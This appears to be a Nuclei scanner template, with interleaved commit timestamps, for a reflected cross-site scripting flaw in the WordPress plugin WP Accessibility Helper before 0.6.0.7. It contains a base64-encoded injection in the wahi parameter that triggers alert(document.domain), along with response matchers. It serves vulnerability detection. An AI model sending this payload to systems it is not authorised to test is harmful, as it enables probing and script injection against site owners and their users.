2022-02-22 07:50:05 +00:00
id : accessibility-helper-xss
2022-02-19 11:13:05 +00:00
info :
name : WP Accessibility Helper (WAH) < 0.6.0.7 - Reflected Cross-Site Scripting (XSS)
author : dhiyaneshDK
severity : medium
description : The plugin does not sanitise and escape the wahi parameter before outputting back its base64 decode value in the page, leading to a Reflected Cross-Site Scripting issue.
2022-04-22 10:38:41 +00:00
reference :
- https://wpscan.com/vulnerability/7142a538-7c3d-4dd0-bd2c-cbd2efaf53c5
2022-02-19 11:13:05 +00:00
tags : xss,wordpress,wp-plugin,wp
requests :
- method : GET
path :
2022-02-22 07:50:05 +00:00
- '{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v'
2022-02-19 11:13:05 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-02-22 07:50:05 +00:00
- "var wah_target_src = '';alert(document.domain);//';"
2022-02-19 11:13:05 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
- 200